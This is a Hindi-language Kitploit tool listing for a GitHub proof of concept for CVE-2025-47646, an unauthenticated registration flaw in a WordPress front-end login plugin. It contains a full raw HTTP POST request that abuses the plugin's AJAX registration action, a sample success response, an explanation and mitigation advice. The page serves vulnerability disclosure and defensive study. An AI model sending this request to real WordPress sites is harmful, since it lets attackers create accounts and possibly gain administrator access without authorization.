Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-47646 — WordPress PSW Front-end Login &amp; Registration Plugin <= 1.12 में दोषपूर्ण प्रमाणीकरण की कमजोरी है। | Kitploit
उपकरण/GitHubGitHub/nxploited/cve-2025-47646
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगप्रमाणीकरणलर्निंग और शिक्षा
GitHubnxploited/cve-2025-47646

CVE-2025-47646

WordPress PSW Front-end Login &amp; Registration Plugin <= 1.12 में दोषपूर्ण प्रमाणीकरण की कमजोरी है।

रिपॉजिटरी देखें
211 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

🔐 CVE-2025-47646 – PSW Front-end Login & Registration <= 1.12

📌 प्लगइन जानकारी

  • प्लगइन: PSW Front-end Login & Registration
  • कमजोर संस्करण: <= 1.12
  • CVE: CVE-2025-47646
  • गंभीरता: उच्च (CVSS 9.8)
  • कमजोरी का प्रकार: टूटा हुआ प्रमाणीकरण
  • आवश्यक विशेषाधिकार: अनधिकृत
  • पैच किया गया: ❌ कोई आधिकारिक सुधार उपलब्ध नहीं
  • पैच प्राथमिकता: 🔴 उच्च
  • प्रकाशन तिथि: 08 मई 2025

⚠️ कमजोरी का सारांश

यह प्लगइन अपने पंजीकरण तंत्र में एक गंभीर खामी को उजागर करता है।
जबकि यह एक शॉर्टकोड-आधारित फ्रंट-एंड पंजीकरण फॉर्म ([psw_registration]) प्रदान करता है, यह उचित भूमिका प्रतिबंध या सुरक्षित सत्यापन लागू करने में विफल रहता है।

हमलावर इस तंत्र का उपयोग बिना प्रमाणीकरण के खाते बनाने के लिए कर सकते हैं — और यदि साइट का default_role गलत तरीके से कॉन्फ़िगर किया गया है (उदा., administrator पर सेट), तो पूर्ण विशेषाधिकार वृद्धि हो सकती है।


🧪 प्रूफ ऑफ कॉन्सेप्ट (PoC)

✅ लक्ष्य एंडपॉइंट:

root@kitploit:~
POST /wordpress/wp-admin/admin-ajax.php

📥 अनुरोध (जैसे, Burp Suite या curl के माध्यम से):

root@kitploit:~
POST /wp-admin/admin-ajax.php HTTP/1.1

Host: {Host}

User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0

Accept: */*

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate, br

Content-Type: application/x-www-form-urlencoded; charset=UTF-8

X-Requested-With: XMLHttpRequest

Content-Length: 233

Origin: {Host}

Connection: keep-alive

Cookie:

Priority: u=0



first_name=nxploited&last_name=nxploited&new_user_name=nxpl3432oited&new_user_email=NxploitBot%40gmail.com&new_user_password=admin&new_user_password_confirmation=admin&action=register_user_front_end&psw_form=75a32ef38d

psw_form अनुरोध पास करने के लिए आवश्यक नॉन्स फील्ड है।
यह नॉन्स फ्रंट-एंड पर [psw_registration] शॉर्टकोड से गतिशील रूप से उत्पन्न होता है।


✅ सफल प्रतिक्रिया

root@kitploit:~
HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8

<h4>Hello nxploited nxploited</h4>
<p>Thanks for creating an account on our website. Please check your email for activation link...</p>

🛠️ खामी कहाँ है?

  • प्लगइन register_user_front_end तक अनधिकृत AJAX पहुंच की अनुमति देता है
  • यह उपयोगकर्ता भूमिकाएँ निर्दिष्ट करने के लिए WordPress की default_role सेटिंग का सम्मान करता है
  • यदि यह गलत तरीके से कॉन्फ़िगर किया गया है (administrator), तो हमलावर को पूर्ण पहुंच मिल जाती है
  • प्लगइन तर्क में कोई हार्ड-कोडित भूमिका प्रवर्तन या सत्यापन नहीं है।

💬 शॉर्टकोड स्पष्टीकरण

पंजीकरण फॉर्म को उजागर करने और psw_form के लिए एक वैध नॉन्स उत्पन्न करने के लिए, निम्नलिखित शॉर्टकोड का उपयोग किया जाता है:

root@kitploit:~
[psw_registration]

यह एक पंजीकरण फॉर्म प्रस्तुत करता है जिसमें AJAX कॉल को सफल बनाने के लिए आवश्यक छिपा हुआ नॉन्स फील्ड शामिल होता है।


🔐 अनुशंसा

  • अनधिकृत AJAX पंजीकरण को प्रतिबंधित करें
  • सर्वर-साइड भूमिका असाइनमेंट लागू करें
  • default_role को एक सुरक्षित मान (जैसे, subscriber) पर मॉनिटर और लॉक करें
  • यदि कोई अपडेट उपलब्ध नहीं है तो वर्चुअल पैचिंग लागू करें

⚠️ अस्वीकरण

यह रिपोर्ट केवल शैक्षिक और अधिकृत सुरक्षा परीक्षण उद्देश्यों के लिए है।
अनुमति के बिना इस कमजोरी का शोषण कानूनी और नैतिक सीमाओं का उल्लंघन कर सकता है।


NXploited (Khaled_Alenazi)

टूल डाउनलोड करें